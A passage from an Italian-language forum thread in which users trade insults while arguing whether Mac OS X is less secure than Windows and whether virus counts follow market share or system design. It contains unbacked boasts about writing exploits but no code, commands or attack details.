            e qui sei un maestro Jedi ;-)Vedo che non ci intendiamo, facciamo un passo indietro.Perchè non ci sono virus per macintosh? Perchè nessuno ha interesse a farnePerchè nessuno ha interesse a farne?Perchè la diffusione del mac non giustifica la perdita di tempoPerche'? Perchè chi paga i programmatori per scrivere gli exploit ha interesse a colpire i sistemi più diffusiOra tira fuori il portafogli e quantifica... poi se ne riparla.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            qui non è un problema di sentirsi figo, ma

            provare quanto si

            afferma.



            e qui sei un maestro Jedi ;-)

            Vedo che non ci intendiamo, facciamo un passo
            indietro.

            Perchè non ci sono virus per macintosh? perché quelli che hanno tentato di fare sono proof of eploits che necessitano un conto admin e l'intervento dell'utente che deve immettere la pw
            Perchè nessuno ha interesse a farneperché non è vero, i tentativi ci sono , ma i risultati sono poveri.non eri tu quello che diceva che sono quelli che fanno gli antivirus a crearli? come mai anche la bufala di intego s'è sciolta come neve al sole?
            Perchè nessuno ha interesse a farne?e a te chi lo ha detto?
            Perchè la diffusione del mac non giustifica la
            perdita di
            tempoballe...il primo che riuscirà a farne uno funzionante e dannoso, oltre che a finire su tutti i siti di news, verrà assunto da grosse aziende
            Perche'? perché poni delle domande stupide?
            Perchè chi paga i programmatori per scrivere gli
            exploit ha interesse a colpire i sistemi più
            diffusi
            perché hanno interesse a colpire i sistemi + groviera e il fatto che siano diffusi moltiplica il loro business.se windows imbucabile, pur mantenendo la diffusione, nessuno avrebbe problemi.essendo l'origine dei problemi l'OS stesso la diffusione non è la causa, ma un'aggravante.
            Ora tira fuori il portafogli e quantifica... poi
            se ne
            riparla.di cosa vuoi parlare? delle scempiaggini che ci vomiti?
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            Perchè non ci sono virus per macintosh?
            perché quelli che hanno tentato di fare sono
            proof of eploits che necessitano un conto admin e
            l'intervento dell'utente che deve immettere la
            pwQuelli non sono virus. Li potresti scrivere persino tu.

            Perchè nessuno ha interesse a farne
            perché non è vero, i tentativi ci sono , ma i
            risultati sono
            poveri.Quindi sono tentativi di gente scarsa. Utenti mac appunto.

            Perchè la diffusione del mac non giustifica la

            perdita di

            tempo

            balle...il primo che riuscirà a farne uno
            funzionante e dannoso, oltre che a finire su
            tutti i siti di news, verrà assunto da grosse
            aziendeOhhh... sicuro, prima o dopo essere finito in carcere? E poi da quali grosse aziende? Quelle che sviluppano antivirus? E chi scriverà virus se assumono uno dei pochi capaci di farne?

            Perche'?
            perché poni delle domande stupide?Perchè mi aspetto risposte stupide.
            perché hanno interesse a colpire i sistemi +
            groviera e il fatto che siano diffusi moltiplica
            il loro
            business.Infatti unix è bucatissimo e ci stai arrivando piano piano... almeno hai capito il concetto di business.
            se windows imbucabile, pur mantenendo la
            diffusione, nessuno avrebbe
            problemi.Ma tu hai ammesso che non ci sono sistemi sicuri al 100%.
            essendo l'origine dei problemi l'OS stesso la
            diffusione non è la causa, ma
            un'aggravante.Bene ma se spiegassi cosa nell'OS è causa di tanti problemi ci capiremmo meglio.

            Ora tira fuori il portafogli e quantifica... poi

            se ne

            riparla.


            di cosa vuoi parlare? delle scempiaggini che ci
            vomiti?No, del fatto che non capisci, parliamone. E' colpa del macintosh? Il fatto che tu lo usi è causa o effetto dei tuoi problemi di comprensione?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone


            Perchè non ci sono virus per macintosh?

            perché quelli che hanno tentato di fare sono

            proof of eploits che necessitano un conto admin
            e

            l'intervento dell'utente che deve immettere la

            pw

            Quelli non sono virus. Li potresti scrivere
            persino tu.
            sono gli unici funzionanzi e sono proof of explits.ma continuiamo ad attendere i tuo di risultati, che tardano ad arrivare...per fortuna era una passeggiata



            Perchè nessuno ha interesse a farne

            perché non è vero, i tentativi ci sono , ma i

            risultati sono

            poveri.

            Quindi sono tentativi di gente scarsa. Utenti mac
            appunto.
            certo...peccato che non puoi provare quanto dici perché sai che hai scritto una razzata



            Perchè la diffusione del mac non giustifica la


            perdita di


            tempo



            balle...il primo che riuscirà a farne uno

            funzionante e dannoso, oltre che a finire su

            tutti i siti di news, verrà assunto da grosse

            aziende

            Ohhh... sicuro, prima o dopo essere finito in
            carcere?è notorio che le carceri siano piene di coloro che hanno scritto tutti quei virus per winma LOL E poi da quali grosse aziende? Quelle
            che sviluppano antivirus? E chi scriverà virus se
            assumono uno dei pochi capaci di
            farne?
            se tu non ne vedi le implicazioni non significa che non ne esistano


            Perche'?

            perché poni delle domande stupide?

            Perchè mi aspetto risposte stupide.
            giusto risposte stupide ad uno stupido che non sa porre che domande stupide.

            perché hanno interesse a colpire i sistemi +

            groviera e il fatto che siano diffusi moltiplica

            il loro

            business.

            Infatti unix è bucatissimo e ci stai arrivando
            piano piano... almeno hai capito il concetto di
            business.
            certo....bucatissimo...windows invece noma LOL


            se windows imbucabile, pur mantenendo la

            diffusione, nessuno avrebbe

            problemi.

            Ma tu hai ammesso che non ci sono sistemi sicuri
            al
            100%.
            appunto, ma pur ammettendo per assurdo la tua teoria fa acqua.e dal momento che è bucabile, non lo è per colpa della sole diffusionedifficle per te, lo comprendo

            essendo l'origine dei problemi l'OS stesso la

            diffusione non è la causa, ma

            un'aggravante.

            Bene ma se spiegassi cosa nell'OS è causa di
            tanti problemi ci capiremmo meglio.
            dovresti saperlo da te quali sono le differenze tra windows e linux/*nix visto che è una passeggiata scrivere virus per OS X e giéà che ci sei vorrei de riferimenti teorici che dimostrino che la diffusione è la causa della bucabilità di windows.


            Ora tira fuori il portafogli e quantifica...
            poi


            se ne


            riparla.





            di cosa vuoi parlare? delle scempiaggini che ci

            vomiti?

            No, del fatto che non capisci, parliamone. E'
            colpa del macintosh? Il fatto che tu lo usi è
            causa o effetto dei tuoi problemi di
            comprensione?non vorrei farti cadere quelle poche certezze, ma uso PC con win XP, e con Vista, un vecchio Mac e un PC con ubuntu.ci riprovi cazzaro DOC?
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            Quelli non sono virus. Li potresti scrivere

            persino tu.
            sono gli unici funzionanzi e sono proof of
            explits.Proof di che se ti chiedono la password, non sai neanche che vuol dire?
            ma continuiamo ad attendere i tuo di risultati,
            che tardano ad arrivare...per fortuna era una
            passeggiataMa mentre ti scrivo ne ho gia scritti 10 di exploits per mac.
            certo...peccato che non puoi provare quanto dici
            perché sai che hai scritto una
            razzataOgni volta che posti lo provi.

            Ohhh... sicuro, prima o dopo essere finito in

            carcere?

            è notorio che le carceri siano piene di coloro
            che hanno scritto tutti quei virus per
            winPerchè è notorio che tutti quelli che scrivono virus per win sono stati assunti da grandi aziende dopo aver avuto fama e gloria.
            E poi da quali grosse aziende? Quelle

            che sviluppano antivirus? E chi scriverà virus
            se

            assumono uno dei pochi capaci di

            farne?
            se tu non ne vedi le implicazioni non significa
            che non ne
            esistanoVero ma il fatto che non esistano non significa che tu debba inventarle.
            giusto risposte stupide ad uno stupido che non sa
            porre che domande
            stupide.Quindi dialogo tra stupidi.

            Infatti unix è bucatissimo e ci stai arrivando

            piano piano... almeno hai capito il concetto di

            business.
            certo....bucatissimo...windows invece noMa non mi posti mai i link dove scrivo certe cose?
            appunto, ma pur ammettendo per assurdo la tua
            teoria fa
            acqua.
            e dal momento che è bucabile, non lo è per colpa
            della sole
            diffusioneE chi ha detto che un software è bucabile per via della diffusione? Un software è bucabile a prescindere, poi per via della diffusione viene effettivamente bucato.
            difficle per te, lo comprendoStrano fino ad ora non hai avuto molto successo nel comprendere.
            dovresti saperlo da te quali sono le differenze
            tra windows e linux/*nix visto che è una
            passeggiata scrivere virus per OS
            XMa io le so, voglio vedere se le sai tu.
            e giéà che ci sei vorrei de riferimenti teorici
            che dimostrino che la diffusione è la causa della
            bucabilità di
            windows.Ma io vorrei la prova che dio esiste, che macosx è più sicuro di windows, riesci a dimostrarmi almeno la prima?
            non vorrei farti cadere quelle poche certezze, ma
            uso PC con win XP, e con Vista, un vecchio Mac e
            un PC con
            ubuntu.E uno solo non ti basta? Parliamo anche di questo...
            ci riprovi cazzaro DOC?Se ci tieni...
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone


            Quelli non sono virus. Li potresti scrivere


            persino tu.

            sono gli unici funzionanzi e sono proof of

            explits.

            Proof di che se ti chiedono la password, non sai
            neanche che vuol dire?vuol dire che come virus hanno vita breve.o tu sei abituato a dare la psw di admin ad ogni PamelaNuda.exe che scarichi?


            ma continuiamo ad attendere i tuo di risultati,

            che tardano ad arrivare...per fortuna era una

            passeggiata

            Ma mentre ti scrivo ne ho gia scritti 10 di
            exploits per mac.
            uh, immagino.postacene almeno uno, e già che ci sei spiegaci su che servizio/falla si appoggiano.e non dimenticarti di ritirare il premio(no, non il premio c@zzaro, per quello dovete ancora superare le nomination)

            certo...peccato che non puoi provare quanto dici

            perché sai che hai scritto una

            razzata

            Ogni volta che posti lo provi.allorquando il nonè bli mosca sul ma anche no.(tanto a 'sto punto...)


            Ohhh... sicuro, prima o dopo essere finito in


            carcere?



            è notorio che le carceri siano piene di coloro

            che hanno scritto tutti quei virus per

            win

            Perchè è notorio che tutti quelli che scrivono
            virus per win sono stati assunti da grandi
            aziende dopo aver avuto fama e gloria.è anche ormai notorio che vivi in una dimensione parallela oppure che hai seri problemi con la percezione delle realtà.


            E poi da quali grosse aziende? Quelle


            che sviluppano antivirus? E chi scriverà virus

            se


            assumono uno dei pochi capaci di


            farne?

            se tu non ne vedi le implicazioni non significa

            che non ne

            esistano

            Vero ma il fatto che non esistano non significa
            che tu debba inventarle.
            abnab onovel icf sba.

            giusto risposte stupide ad uno stupido che non
            sa

            porre che domande

            stupide.

            Quindi dialogo tra stupidi. benvenuto

            dovresti saperlo da te quali sono le differenze

            tra windows e linux/*nix visto che è una

            passeggiata scrivere virus per OS

            X

            Ma io le so, voglio vedere se le sai tu. lol, come all'asilo...gne gne gne!poche ciancie: posta o taci.
            Ma io vorrei la prova che dio esiste, che macosx
            è più sicuro di windows, riesci a dimostrarmi
            almeno la prima?la prima non è dimostrabile (ed è pure ot ed argomento ad ominem)per la seconda...fatto.se poi la comprensione del testo ti handicappa, tuo problema. (è una citazione di EeLSt)
            E uno solo non ti basta? Parliamo anche di
            questo...
            parliamo anche del fatto che ti comperi computer al supermercato?

            ci riprovi cazzaro DOC?

            Se ci tieni...sarebbe inutile ormai il tuo bollino è assegnato:WinC@zzaro DOC
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            Proof di che se ti chiedono la password, non sai

            neanche che vuol dire?

            vuol dire che come virus hanno vita breve.
            o tu sei abituato a dare la psw di admin ad ogni
            PamelaNuda.exe che
            scarichi?Vuol dire che non sono virus. Hai presente il virus albanese, dovevano chiamarlo virus macaco, è l'unico che sono riusciti a scrivere fino ad ora.
            uh, immagino.
            postacene almeno uno, e già che ci sei spiegaci
            su che servizio/falla si
            appoggiano.
            e non dimenticarti di ritirare il premio
            (no, non il premio c@zzaro, per quello dovete
            ancora superare le
            nomination)Mentre scrivevo i 10 exploit ne ho scritto altri 10, ho exploitato tutti i servizi e ho trovato un paio di bug in bootcamp per cui posso disinstallare macos da tutte le macchine che voglio. Ma ovviamente non te lo dico...
            è anche ormai notorio che vivi in una dimensione
            parallela oppure che hai seri problemi con la
            percezione delle
            realtà.Infatti vi percepisco come due persone diverse ma evidentemente siete la stessa.
            abnab onovel icf sba.fvrgr gebccb vqvbgv ibv znpnpuv

            Quindi dialogo tra stupidi.
            benvenutoGrazie.
            lol, come all'asilo...
            gne gne gne!

            poche ciancie: posta o taci.Fatto.
            la prima non è dimostrabile (ed è pure ot ed
            argomento ad
            ominem)
            per la seconda...fatto.Ah ho appena dimostrato che la tua dimostrazione è sbagliata.
            se poi la comprensione del testo ti handicappa,
            tuo
            problema.

            (è una citazione di EeLSt)Eh davanti a questa dimostrazione di cultura come controbattere.
            parliamo anche del fatto che ti comperi computer
            al
            supermercato?Hai mica notato che ora nei supermercati cominciano a spuntare gli apple point?
            sarebbe inutile ormai il tuo bollino è assegnato:

            WinC@zzaro DOCMa sarà trendy? Mi disegni anche il logo con il tuo mac (si devi accenderlo)?
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.

            Vuol dire che non sono virus. Hai presente il
            virus albanese, dovevano chiamarlo virus macaco,
            è l'unico che sono riusciti a scrivere fino ad
            ora.e quindi dove sono questi virus?(giro giro tondo...)
            Mentre scrivevo i 10 exploit ne ho scritto altri
            10, ho exploitato tutti i servizi e ho trovato un
            paio di bug in bootcamp per cui posso
            disinstallare macos da tutte le macchine che
            voglio. Ma ovviamente non te lo dico...seee seee, ed io ieri ho salvato il mondo da un'invasione aliena, ho fondato due nuove religioni e mi sono spupazzato le 15 finaliste di miss mondo (tutte insieme).ho le foto e posso dimostrartelo quando vuoi, ma ovviamente non le posto :D(da asilo.)



            è anche ormai notorio che vivi in una dimensione

            parallela oppure che hai seri problemi con la

            percezione delle

            realtà.

            Infatti vi percepisco come due persone diverse ma
            evidentemente siete la
            stessa.confermi i tuoi problemi sensoriali.una bella dose di lexotan e ti addormenti sereno...

            abnab onovel icf sba.

            fvrgr gebccb vqvbgv ibv znpnpuvah, allora è vero! capisci il niente! :D


            Quindi dialogo tra stupidi.

            benvenuto

            Grazie. di nulla, tanto mammà è sempre incinta...

            lol, come all'asilo...

            gne gne gne!



            poche ciancie: posta o taci.

            Fatto. no, nella tua dimensione non vale.(nemmeno a paperopoli)

            la prima non è dimostrabile (ed è pure ot ed

            argomento ad

            ominem)

            per la seconda...fatto.

            Ah ho appena dimostrato che la tua dimostrazione
            è
            sbagliata.minchia, come no: 400 e passa post e NON UN F*TTUTO LINK o anche mezzo exploit che fungi senza password.bella dimostrazione, staresti bene in politica.

            se poi la comprensione del testo ti handicappa,

            tuo

            problema.



            (è una citazione di EeLSt)

            Eh davanti a questa dimostrazione di cultura come
            controbattere.con il seguito della canzone (che non sai, a quanto pare)


            parliamo anche del fatto che ti comperi computer

            al

            supermercato?

            Hai mica notato che ora nei supermercati
            cominciano a spuntare gli apple point?
            sarà che la gente è stufa di portarsi a casa cassoni inutili?

            sarebbe inutile ormai il tuo bollino è
            assegnato:



            WinC@zzaro DOC

            Ma sarà trendy? Mi disegni anche il logo con il
            tuo mac (si devi
            accenderlo)?work in progress
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone


            Quelli non sono virus. Li potresti scrivere


            persino tu.

            sono gli unici funzionanzi e sono proof of

            explits.

            Proof di che se ti chiedono la password, non sai
            neanche che vuol dire?
            certo....quando avrai studiato la materia ripassa eh


            ma continuiamo ad attendere i tuo di risultati,

            che tardano ad arrivare...per fortuna era una

            passeggiata

            Ma mentre ti scrivo ne ho gia scritti 10 di
            exploits per mac.
            certo...infatti continuano a mancare i fatti cazzaro DOC


            certo...peccato che non puoi provare quanto dici

            perché sai che hai scritto una

            razzata

            Ogni volta che posti lo provi.
            su una cosa hai ragione...che ogni volta che posto si mette in luce una tua razzata


            Ohhh... sicuro, prima o dopo essere finito in


            carcere?



            è notorio che le carceri siano piene di coloro

            che hanno scritto tutti quei virus per

            win

            Perchè è notorio che tutti quelli che scrivono
            virus per win sono stati assunti da grandi
            aziende dopo aver avuto fama e gloria.
            certo...ma non eri tu il genio che dicevi che vanno tutti in galera?


            E poi da quali grosse aziende? Quelle


            che sviluppano antivirus? E chi scriverà virus

            se


            assumono uno dei pochi capaci di


            farne?

            se tu non ne vedi le implicazioni non significa

            che non ne

            esistano

            Vero ma il fatto che non esistano non significa
            che tu debba inventarle.
            il che sta a te dimostrarlo che siano invenzioni....dato che tu non le vedi, non implica che non esistaoaltro giro altra figura del cazzaro eh


            giusto risposte stupide ad uno stupido che non
            sa

            porre che domande

            stupide.

            Quindi dialogo tra stupidi.
            nel tuo cas...sicuramente è stupidità...per me sono alcune ore dedicate a casi sociali


            Infatti unix è bucatissimo e ci stai arrivando


            piano piano... almeno hai capito il concetto
            di


            business.

            certo....bucatissimo...windows invece no

            Ma non mi posti mai i link dove scrivo certe cose?
            rileggiti ogni post...è quello che affemi da ore cazzaro

            appunto, ma pur ammettendo per assurdo la tua

            teoria fa

            acqua.

            e dal momento che è bucabile, non lo è per colpa

            della sole

            diffusione

            E chi ha detto che un software è bucabile per via
            della diffusione? Un software è bucabile a
            prescindere, poi per via della diffusione viene
            effettivamente bucato.
            se è bucabile a prescindere la diffusione è irrilevante serve solo ad accentuarne i dannima pure da solo ti contraddici ora?che cazzaro


            difficle per te, lo comprendo

            Strano fino ad ora non hai avuto molto successo
            nel
            comprendere.
            comprendere stupidate non è il mio forte...ma tu sei bravissimo a scriverne

            dovresti saperlo da te quali sono le differenze

            tra windows e linux/*nix visto che è una

            passeggiata scrivere virus per OS

            X

            Ma io le so, voglio vedere se le sai tu.
            ma io le so..atttendo solo i tuoi fatti..ovvero dimostrarci che è una passeggiata scrivere virus per Os X.te ne vantavi...dimostracelo cazzaro DOC

            e giéà che ci sei vorrei de riferimenti teorici

            che dimostrino che la diffusione è la causa
            della

            bucabilità di

            windows.

            Ma io vorrei la prova che dio esiste, che macosx
            è più sicuro di windows, riesci a dimostrarmi
            almeno la prima?
            la prima è un dogma, la seconda un dato di fatto.vuoi continuare a fare la figura del pirl8?


            non vorrei farti cadere quelle poche certezze,
            ma

            uso PC con win XP, e con Vista, un vecchio Mac e

            un PC con

            ubuntu.

            E uno solo non ti basta? Parliamo anche di
            questo...

            non credo debba interressare a te la cosa

            ci riprovi cazzaro DOC?

            Se ci tieni...riprovaci cazzaro DOC
          • lellykelly scrive:
            Re: MAC OS X più vulnerabile di Windows.
            è inutile farlo perchè non si ottiene nulla e poi perchè non ne saresti assolutamente capace, dato che non sai neppure di cosa parli
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: lellykelly
            è inutile farlo perchè non si ottiene nulla e poi
            perchè non ne saresti assolutamente capace, dato
            che non sai neppure di cosa
            parliE' arrivato l'altro... ma macosx brucia anche il cervello oltre ai bios?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone
            - Scritto da: lellykelly

            è inutile farlo perchè non si ottiene nulla e
            poi

            perchè non ne saresti assolutamente capace, dato

            che non sai neppure di cosa

            parli

            E' arrivato l'altro... ma macosx brucia anche il
            cervello oltre ai
            bios?continuiamo a leggera parole e niente fatti.
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            continuiamo a leggera parole e niente fatti.Perchè devi smettere di leggere e basta e cominciare a capire quello che leggi. Non è difficile...
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            continuiamo a leggera parole e niente fatti.

            Perchè devi smettere di leggere e basta e
            cominciare a capire quello che leggi. Non è
            difficile...fatti non pugnette...
          • HeroProtagonist scrive:
            Re: MAC OS X più vulnerabile di Windows.
            Mai sentito parlare di etica hacker.Un sistema non bucabile é la pacchia per un vero hacker. Immagina l'orgoglio e il ritorno che avresti ad essere il primo a sviluppare un virus effettivo per OS X. niente a che fare con rubare dati o zombare i sistemi... giusto una bella finestrella che dice che sei stato infettato.
          • lellykelly scrive:
            Re: MAC OS X più vulnerabile di Windows.
            a parole loro riuscirebbero a farcela in 5 minuti, solo che non ne hanno voglia...
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: lellykelly
            a parole loro riuscirebbero a farcela in 5
            minuti, solo che non ne hanno
            voglia...Bhe ma mi aspetto allora che tu mi scriva un bel trojan per windows, è facile no? Windows è un colabrodo. Che ci vuole? Dai sul mio pc ho il numero della carta di credito salvato in my documents ... Ce la fai per domani a farmi addebitare qualcosa sopra?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone
            - Scritto da: lellykelly

            a parole loro riuscirebbero a farcela in 5

            minuti, solo che non ne hanno

            voglia...

            Bhe ma mi aspetto allora che tu mi scriva un bel
            trojan per windows, è facile no? dove ha scritto che per lui è facile?Windows è un
            colabrodo. Che ci vuole?
            ci sono già in circolazione, vuoi reinventare la ruota?
            Dai sul mio pc ho il numero della carta di
            credito salvato in my documents ...
            ecco comprati un cervello per natale
            Ce la fai per domani a farmi addebitare qualcosa
            sopra?certo...intanto affermavi che è una passeggiava farlo su OS X o *nix o lunix...ci dai la prova?
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            Bhe ma mi aspetto allora che tu mi scriva un bel

            trojan per windows, è facile no?

            dove ha scritto che per lui è facile?Beh ma allora non è universalmente facile, ci vuole del talento.
            Windows è un

            colabrodo. Che ci vuole?
            ci sono già in circolazione, vuoi reinventare la
            ruota?Meglio ancora, ne prende uno che gia esiste e fa in modo che entri nel mio pc, non ho ne antivirus ne firewall.
            ecco comprati un cervello per nataleDovresti averlo capito (oh scusa non volevo) che a comprare cervelli sotto natale si prendono fregature.

            Ce la fai per domani a farmi addebitare qualcosa

            sopra?
            certo...intanto affermavi che è una passeggiava
            farlo su OS X o *nix o lunix...ci dai la
            prova?Entra nel mio pc con windows, ci trovi sopra il sorgente di un virus per mac.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            fatti non pugnette...trollazzo
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            fatti non pugnette...trollazzoLol...
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            i fatti cazzaro, i fatti
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: HeroProtagonist
            Mai sentito parlare di etica hacker.
            Un sistema non bucabile é la pacchia per un vero
            hacker. Immagina l'orgoglio e il ritorno che
            avresti ad essere il primo a sviluppare un virus
            effettivo per OS X. niente a che fare con rubare
            dati o zombare i sistemi... giusto una bella
            finestrella che dice che sei stato
            infettato.Ma allora non lo capite? Non è un problema scrivere un worm, non è un problema trovare un exploit di root escalation... per unix ne escono tutti i santi giorni. I virus per mac non si diffondono perchè non ci sono mac da infettare. E poi sta storia dell'orgoglio ma siete tutti 15enni? Sai cosa ottieni se scrivi un virus che si diffonde globalmente... carcere e cause di risarcimento.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone
            - Scritto da: HeroProtagonist

            Mai sentito parlare di etica hacker.

            Un sistema non bucabile é la pacchia per un vero

            hacker. Immagina l'orgoglio e il ritorno che

            avresti ad essere il primo a sviluppare un virus

            effettivo per OS X. niente a che fare con rubare

            dati o zombare i sistemi... giusto una bella

            finestrella che dice che sei stato

            infettato.

            Ma allora non lo capite? Non è un problema
            scrivere un worm, non è un problema trovare un
            exploit di root escalation... per unix ne escono
            tutti i santi giorni.
            link a tutti questi "problemi" giornalieri?
            I virus per mac non si diffondono perchè non ci
            sono mac da infettare.
            certo...intanto comincia a farlo con uno poi la questione del numero che puoi infettare è un dettaglio....in fondo per te èè una passeggiata
            E poi sta storia dell'orgoglio ma siete tutti
            15enni?

            Sai cosa ottieni se scrivi un virus che si
            diffonde globalmente... carcere e cause di
            risarcimento.e quindi come spieghi l'esistenza di tanti virus per windows che hanno fatto tanti danni ?dai che rimedi figuracce ad ogni sparata
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            Ma allora non lo capite? Non è un problema

            scrivere un worm, non è un problema trovare un

            exploit di root escalation... per unix ne escono

            tutti i santi giorni.



            link a tutti questi "problemi" giornalieri?Eh ti deve essere sfuggito il post sotto dove te li elenco, infatti ho visto che non hai risposto. Strano.
            certo...intanto comincia a farlo con uno poi la
            questione del numero che puoi infettare è un
            dettaglio....in fondo per te èè una
            passeggiataEggià è proprio un dettaglio.
            e quindi come spieghi l'esistenza di tanti virus
            per windows che hanno fatto tanti danni
            ?Tanti soldi in ballo.
            dai che rimedi figuracce ad ogni sparataMa perchè tu realmente pensi di stare rispondendo in maniera logica?
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            fatti non pugnette trollazzo
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            fatti non pugnette trollazzoQuanti soldi hai da darmi? La tua paghetta non basta...
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            fuori i fatti cazzaro
          • logicaMente scrive:
            Re: MAC OS X più vulnerabile di Windows.
            Bravo, quoto, meno male che qualcuno l'ha detto!
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone
            - Scritto da: PLONK_THIS

            se hai prove e non illazioni postale e saremo

            tutti curiosi di

            acculturarci.



            fino a quel momento con la teoria della poca

            diffusione palesi solo di non conoscere le

            architetture di sistema che non son tutte
            uguali,

            ma soprattutto e fotunatamente non come

            windows

            Non ci sono virus per C64, non ci sono virus per
            amiga, non ci sono virus linux, non ci sono virus
            per os/2, non ci sono virus per beos... cos'hanno
            in comune questi sistemi operativi? Sono tutti
            sotto l'1%
            dell'installato.ottimo argomento, peccato che la tua teoria sulla diffusione fa acqua appunto perché windows, linux, *nix sono sono "fatti" allo stesso modo.
            Ci sono in compenso una tonnellata di exploit,
            falle, vulnerabilità per servizi tipici dei
            sistemi unix, ftp, telnet, ssh, sendmail, ecc.
            Cos'hanno in comune questi servizi? Sono molto
            diffusi.
            hai dei dati che siano concreti, vero?
            Tu hai prove per dire che os x immune da bug?dove l'ho scritto?sei tu che teorizzi sul fatto che sia solo merito della diffusione ignorando che OSX e windows non sono "costruiti" allo stesso modo.
            Direi di no visto che te ne hanno appena patchati
            31, cosa ci voleva per scrivere un exploit?dimmelo tu che sei un esperto?e spiegami come mai se è così facile, come mai non ce ne sono? delle 2 l'una, o è troppo facile farne o è una questione di diffusione...
            Qualcuno che lo facesse e per la legge di grandi
            numeri è molto meno probabile che qualcuno lo
            faccia per osx rispetto a windows.
            nonsense.the more is difficult the more is fun, che credi? che nessun gruppo di hackers lavori per farne per OS X? suvvia usa google e datti una svegliata

            So che la fredda logica matematica sconvolte il
            macaco medio, ma il mondo non è solo
            design.se la tua logica matematica è questa allora stiamo messi molto ma molto male...
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.

            the more is difficult the more is fun, che credi?verissimo: è molto più interessante entrare (ed uscirne incolumi ;) ) in un RTos o nei pochi residuati bellici (VAX, Aos, riscos o solaris vari) che nei soliti, noiosissimi, prevedibili ed inutili wincassoni.solo per le botnet tornano utili...e infatti...
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.



            fino a quel momento con la teoria della poca


            diffusione palesi solo di non conoscere le


            architetture di sistema che non son tutte

            uguali,


            ma soprattutto e fotunatamente non come


            windows



            Non ci sono virus per C64, non ci sono virus per

            amiga, non ci sono virus linux, non ci sono
            virus

            per os/2, non ci sono virus per beos...
            cos'hanno

            in comune questi sistemi operativi? Sono tutti

            sotto l'1%

            dell'installato.

            ottimo argomento, peccato che la tua teoria sulla
            diffusione fa acqua appunto perché windows,
            linux, *nix sono sono "fatti" allo stesso
            modo.Questa frase cosa vorrebbe dire? Te lo spiego in due parole poche macchine installate = poca gente che scrive virus, tante macchine installate = tanta gente che scrive virus.

            Ci sono in compenso una tonnellata di exploit,

            falle, vulnerabilità per servizi tipici dei

            sistemi unix, ftp, telnet, ssh, sendmail, ecc.

            Cos'hanno in comune questi servizi? Sono molto

            diffusi.



            hai dei dati che siano concreti, vero?Google ti aiuta sempre. Cerca exploit e aggiungi uno qualunque dei servizi unix più comuni, telnet, ftp, ecc.
            dove l'ho scritto?
            sei tu che teorizzi sul fatto che sia solo merito
            della diffusione ignorando che OSX e windows non
            sono "costruiti" allo stesso
            modo.L'hai scritto dicendo che osx è sicuro, scrivendo una enorme castroneria. Osx è bucabile come qualsiasi altro sistema operativo, è fatto con la qualità di qualsiasi altro sistema operativo commerciale (tralasciamo le distro linux che sono dei colapasta) e quindi subisce attacchi dei virus come qualsiasi altro sistema: in base alla sua diffusione. La diffusione è infima, i virus sono pochissimi. La diffusione è tanta i virus sono tanti e tra questi tanti ce n'e' qualcuno particolarmente pesante. Unix che ha una diffusione lato server comparabile con windows lato desktop subisce attacchi, e viene bucato, in continuazione: un giorno è ssh, un giorno è ftp, un giorno è sendmail ...

            Direi di no visto che te ne hanno appena
            patchati

            31, cosa ci voleva per scrivere un exploit?

            dimmelo tu che sei un esperto?
            e spiegami come mai se è così facile, come mai
            non ce ne sono? delle 2 l'una, o è troppo facile
            farne o è una questione di
            diffusione...Io direi anche entrambe, però vedi che ci arrivi?

            Qualcuno che lo facesse e per la legge di grandi

            numeri è molto meno probabile che qualcuno lo

            faccia per osx rispetto a windows.



            nonsense.Argomenti a profusione eh?
            the more is difficult the more is fun, che credi?
            che nessun gruppo di hackers lavori per farne per
            OS X? suvvia usa google e datti una
            svegliataInfatti evidentemente per macosx è sia troppo facile che poco remunerativo. Suvvia anche senza usare google datti una svegliata... e pensa ai motivi veri, non a quelli che vedi in tv (uccidere gli alieni, scoprire i segreti della cattiva corporation, ecc), per cui vengono creati i virus.
            se la tua logica matematica è questa allora
            stiamo messi molto ma molto
            male...Che tu sia messo molto male si vede... non hai uno straccio di argomento, però devo ammettere che si fa molta fatica a risponderti visto che non c'e' una logica da seguire.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.


            ottimo argomento, peccato che la tua teoria
            sulla

            diffusione fa acqua appunto perché windows,

            linux, *nix sono sono "fatti" allo stesso

            modo.

            Questa frase cosa vorrebbe dire? Te lo spiego in
            due parole poche macchine installate = poca gente
            che scrive virus, tante macchine installate =
